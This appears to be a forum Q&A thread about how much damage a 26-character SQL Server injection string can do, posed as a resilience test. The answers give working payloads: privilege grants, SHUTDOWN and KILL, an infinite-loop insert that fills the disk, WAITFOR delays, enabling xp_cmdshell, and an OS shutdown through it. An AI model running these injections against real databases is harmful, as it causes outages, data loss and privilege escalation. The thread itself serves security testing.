SQL Server injection - how much damage in 26 chars?

Question

I'm testing for resilience against injection attacks on an SQL Server database.

All table names in the db are lower case, and the collation is case-sensitive, Latin1_General_CS_AS.

The string I can send in is forced to uppercase, and can be a maximum of 26 characters in length. So I can't send in a DROP TABLE because the table name would be in uppercase and thus the statement would fail due to the collation.

So - what's the maximum damage I could do in 26 characters?

EDIT

I know all about parameterised queries and so forth - let's imagine that the person who developed the front end that builds the query to send in didn't use params in this case.

I'm also not trying to do anything nefarious, this is a system built by somebody else in the same organisation.

Answer 1

Easy:

GRANT EXECUTE TO LowlyDBA

Or, I guess in this case it'd be

grant execute to lowlydba 

Take your pick of variations on this.

In all likelihood you may be able to test this now against your current system, but any number of small changes in the database over time could invalidate your testing. The character string could change, someone could create a lower case stored procedure that has destructive potential - anything. You can never say with 100% confidence that there isn't a destructive 26 character attack someone could construct.

I suggest you find a way to make the developer follow basic industry standard best security practices, if only for your own sake as someone who I presume is at least partially responsible should security breaches happen.

Edit:

And for maliciousness/fun, you could try enabling every trace flag. This would be interesting to observe. Feels like a blog post Brent Ozar would make...

DBCC TRACEON(xxxx, -1)

Answer 2

The SHUTDOWN command or KILL Command (pick a random number over 50) both take significantly less than 26 characters, though the account executing the application queries hopefully doesn't have sufficient permissions to run these.

Answer 3

You could create a table that you then fill up until the end of time or disk space runs out whichever comes first.

declare @S char(26);

set @S = 'create table t(c char(99))';
exec (@S);

set @S = 'insert t values('''')'
exec (@S);

set @S = 'insert t select c from t'
exec (@S);
exec (@S);
exec (@S);
exec (@S);
-- etc

Answer 4

Depending on your definition of damage, you could run this: WAITFOR DELAY '23:59' To be truly evil, you could use a load-testing tool to run that from 32,768 clients.

Answer 5

Variation based on @MikaelEriksson's answer and @MartinSmith's reply to my initial comment:

declare @S char(26);

set @S = 'create table x(i int)';
exec (@S);

Initially I had tried to do a WHILE statement, but the best I could do was 27 characters:

set @S = 'while 1=1 insert t select 0'; -- fails at 27 characters
exec (@S);

But Martin pointed out GOTO:

set @S = 'x:insert t select 0 GOTO x';
exec (@S);

GOTO... the root of all evil and creator of an infinite-loop insert statement in 26 characters.

With that said... it might be advantageous to stick with CHAR(99) instead of int as that would use more space. Other options either use longer names and would smash the 26 character limit... or use less storage space per row.

Full Test Code:

declare @S char(26);
set @S = 'drop table t;';
exec (@S);
GO

declare @S char(26);

set @S = 'create table t(c CHAR(99))';
exec (@S);

set @S = 'x:insert t select 0 GOTO x';
exec (@S);
GO

Answer 6

XP_CMDSHELL 'SHUTDOWN -PF'

Depending on how damaging you consider a power-down to be. :-)

This does require xp_cmdshell to be enabled on the server, something that is not the case for the last few version of SQL Server. It also requires that the service account have the shutdown right, which it may or may not have.

Enabling xp_cmdshell probably goes outside your 26 character limit. Would you allow multiple injections?

SP_CONFIGURE 'SHOW ADV',1

RECONFIGURE

SP_CONFIGURE 'XP', 1

RECONFIGURE